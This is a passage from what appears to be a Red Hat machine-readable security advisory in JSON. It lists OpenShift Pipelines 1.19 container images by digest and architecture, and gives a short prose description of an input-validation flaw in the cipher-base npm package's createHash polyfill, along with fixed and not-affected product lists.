"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2389932"
}
],
"notes": [
{
"category": "description",
"text": "An improper input validation vulnerability was found in the cipher-base npm package. Missing input type checks in the polyfill of the Node.js `createHash` function result in invalid\u00a0value calculations,\u00a0hanging and\u00a0rewinding the\u00a0hash state, including\u00a0turning a tagged hash\u00a0into an untagged\u00a0hash, for malicious JSON-stringifyable\u00a0inputs.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cipher-base: Cipher-base hash manipulation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
